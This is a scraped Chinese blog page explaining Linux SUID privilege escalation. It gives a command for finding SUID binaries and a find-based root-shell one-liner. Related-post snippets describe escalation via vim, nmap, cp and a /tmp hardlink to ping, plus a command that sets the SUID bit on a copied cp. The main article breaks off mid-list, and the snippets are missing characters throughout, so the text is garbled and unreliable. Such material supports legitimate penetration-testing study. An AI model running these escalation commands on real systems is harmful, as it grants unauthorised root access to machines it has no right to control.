SUID提权利用

原创 于 2025-02-13 22:56:08 发布 · 286 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全性测试

SUID提权

利用文件的Set User ID,当文件杯设置了SUID位,即使执行该文件的用户不是文件的拥有者,该用户也会在执行时临时获得文件拥有者的权限。

每个进程运行通常有会有三个与用户身份相关的UID

  • Real Uid:启动这个进程的真实用户。
  • effective UID: 决定进程实际运行时的权限,有效身份ID是进程当前以哪个用户身份运行,决定了它能访问哪些文件和资源。
  • save set-user-id: 保存一个进程的原始有效用户ID,以便稍后可以恢复。当进程发生特权切换,可以用保存的用户ID来恢复到之前的有效用户id。
# 查看命令运行时的有效id
ps -eo pid,uid,euid,cmd

# 查看具有suid标志的文件
find / -perm -u=s -type f 2>/dev/null

常见可以使用提权的命令

# find
find / -exec "/bin/bash" -p \
# vim
code_father1
关注
[升] Linux & 维持 — 系统错误配置 - SUID 文件
Blue17 の 小窝
02-07 1373
例如假设一个程序文件的属主是 root,且该程序文件被赋予了 SUID 属性,那么当其它用户执行该程序文件时,就会以 root 用户的限进行执行。如果该程序被赋予了 SUID 限,且程序拥有人是 Root,则代表用户在执行 Python 代码时都是以 Root 限执行的,很容易造成。通过上面的操作,我们发现了靶机中存在 SUID 的可能,只不过命令是 VIM(这个是笔者故意找罪受的)。是 Linux 系统中的一个编辑文件的命令,若该命令被赋予了 SUID 限,攻击者可以通过修改。
Linux下SUID方法
渗透之路,攻防之间皆学问
10-29 4439
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来的linux可行性的文件列表如下: nmap vim find bash more less nano cp 如下,新建一个2.txt的文件。我们查看限为 -rw-r--r--。接下来我们加上suid限,即让执行该命令的用户以命令拥有
OSCP系列靶场-Esay保姆级
hackzkaq的博客
11-29 226
ftp可匿名登录 → 发现隐藏文件夹 → 发现ssh密钥 → 猜解ssh用户名 →ssh密钥登录 思 路: 发现suid限文件 →cpulimitftp的时候也要有养成查看是否存在隐藏文件的习惯每个文件名可能都有寓意,也要进行信息收集与记录没看够~?欢迎关注!
记一次渗透测试的学习
qq_41252520的博客
07-07 2965
文章目录42Challenge0x0 信息收集0x1 RCE0x2 0x3 引用 42Challenge 0x0 信息收集 因为用的是虚拟机搭建的环境,所以虚拟机之间同处于一个网段下,使用ifconfig查看攻击机的ip ali@kali:~/Desktop$ ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.146.130 netmask 255.255.255
Linux文件属性及
Zane的博客
12-02 1194
查看用户信息 查看用户信息命令 id [root@localhost ~]# id zane uid=1000(zane) gid=1000(zane) groups=1000(zane) whoami 查看当前用户 [root@localhost ~]# whoami root who w 查看用户登录情况 [root@localhost ~]# w 10:21:54 up 8:23, 2 users, load average: 0.00, 0.02, 0.00 USER
Linux 特 SUID/SGID 的详解
完颜振江
09-12 1073
SUID允许程序以文件所有者的身份执行,主要用于升用户限。SGID允许程序以文件组的身份执行,并可用于目录内文件继承组限。使用这些特时需要小心,确保系统的安全性不被破坏。
suid 与sudo
冯的博客
10-29 505
linux
SUID
snowlyzz的博客
08-14 1975
久经不衰的SUID
操作系统升(十九)之Linux-SUID
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 2372
SUID是一种特殊限,设置了suid的程序文件,在用户执行该程序时,用户的限是该程序文件属主的限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的限。sgid与suid类似,只是执行程序时获得的是文件属组的限。passwd这个命令程序的限设置,它就是设置了suid限的只有可以执行的二进制程序文件才能设定SUID限,非二进制文件设置SUID限没任何意义.命令执行者要对该程序文件拥有执行(x)限.命令执行者在执行该程序时获得该程序文件属主的身份.
ping命令suid
技术超强的网络安全平台
12-15 4430
查看tmp目录限 ll -d /tmp 切换到tmp目录 cd /tmp 创建一个exploit目录 mkdir exploit 查看ping命令带suid限 ll /bin/ping 创建target文件硬链接 ln /bin/ping /tmp/exploit/target 查看target文件限 ll /tmp/exploit/target 把target文件加载到内存中 exec 3< /tmp/exploit/target 查看target在内存中的情况 "ll /proc/$$/f.
网络安全基于SQL注入与SUID的靶机渗透技术:Nullbyte靶机信息搜集、漏洞利用升实战分析
最新发布
09-15
③理解SUID、SQL注入、隐写术等安全机制的实际应用与防御思路。; 阅读建议:建议读者结合实验环境同步操作,深入理解每一步命令的作用与原理,重点关注漏洞发现与环节的技术细节,并尝试复现整个攻击链以...
网安学途—SUID教程
星虐
11-18 2247
本文介绍了SUID的基本概念、如何设置SUID限,以及常见的具有SUID限的二进制可执行文件(如nmap、vim、find、bash等)。此外,文章详细阐述了如何利用这些文件进行操作,包括使用find、nmap、more、less、bash、vim、awk和cp等命令的具体方法。最后,文章还对比了/bin/bash和/bin/sh的区别,指出Bash功能更强大,而/bin/sh可能是Bash或其他Shell的符号链接。
浅析Linux系统常规手段的原理与技巧
道阻且长,行则将至
01-08 2950
渗透测试过程中,通过 Web 服务漏洞(比如文件上传漏洞)拿到服务器 Shell 后,经常会发现所获得的 Shell 仅有较低的限,而为了进一步获得高限 Shell(root),避免不了地就是进一步进行。本文来学习、总结下 Linux 系统一些常规的手段的原理与技巧。
SUID
热门推荐
一只web狗
07-01 1万+
SUID介绍
linux 利用tmp
12-30 4980
以一个普通用户登录 [hello@localhost tmp]$ ls -ld /tmp/   因为tmp目录能写文件!! drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/ [hello@localhost tmp]$ cd /tmp/ [hello@localhost tmp]$ mkdir exploit [hello@localhost
记一次渗透测试学习(二)
qq_41252520的博客
07-08 492
文章目录KiraCTF0x0 信息收集0x1 RCE0x2 0x3 参考 KiraCTF 0x0 信息收集 使用netcover探测主机存活: netdiscover -r 192.168.146.0/16 Currently scanning: Finished! | Screen View: Unique Hosts
sudo-为普通用户
侯海云
09-14 8777
目录 目录 sudo简介 sudo特性 相关文件 配置文件 配置支持使用通配符glob 配置文件规则 授规则格式 范例 范例1使用户haiyun能够有限挂载devsr0到mntcdrom目录下 范例2使用户haiyun能够有限编辑etcsudoers文件 范例3使wang用户和haiyun用户能够有限修改IP使用别名实现且不需要输入密码 范例4使wang用户和haiyun用户能够有限查看e
Linux指令:screen,fusermount
喜欢打篮球的普通人
08-29 7378
文章目录一、screen1.介绍和使用session_name session名称2.参考:二、fusermount1.简介2.参考: 一、screen 1.介绍和使用 (1)我们常需要SSH 或者telent 远程登录到Linux 服务器,经常运行一些需要很长时间才能完成的任务,在此期间不能关掉窗口或者断开连接,否则这个任务就会被杀掉,一切半途而废了。这时,我们可以用screen命令解决这个问题...
suidcp
01-20
### SUID方法 当文件设置了SUID位之后,任何运行该程序的用户都会暂时获得拥有者限。这可以被利用来进行操作。为了设置或移除SUID位,可使用`chmod`命令: ```bash chmod u+s filename # 设置SUID位 chmod u-s filename # 移除SUID位 ``` 一旦某个二进制文件具有了SUID限,攻击者可以通过执行此文件来获取更高的限[^2]。 #### 利用SUID进行的具体实例 假设存在一个带有SUID标志的应用程序允许用户修改其行为或参数,则可能成为潜在的安全风险点。例如,如果`/usr/bin/cp`这样的常用工具意外地获得了SUID属性,那么就可以创建恶意脚本并将其复制到受信任的位置从而实现非法访问控制升[^3]。 具体来说,下面是一个不安全的操作案例展示如何滥用这种机制完成过程: ```bash sudo sh -c 'cp $(which cp) .; chmod +s ./cp' ``` 这段代码的作用是从系统的路径中找到真正的`cp`命令位置,并将其副本放置于当前工作目录下;接着赋予新拷贝后的`cp`命令以SUID限。这意味着现在任何人都能以root的身份执行这个本地版本的`cp`指令。 ### CP技巧 对于CP(即copy命令),通常情况下它并不具备直接导致的能力。但是,在某些特殊场景里——比如上述到的情况或是其他形式误配置的情况下——它可以作为辅助手段参与到更复杂的攻击链路之中。特别是当管理员错误地授予了像`cp`这类基本实用程序额外特时,就有可能让普通用户绕过正常的安全限制而达到目的。 需要注意的是,以上描述仅用于教育和技术交流用途,请勿尝试在未经授许可的前下实施此类行动。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值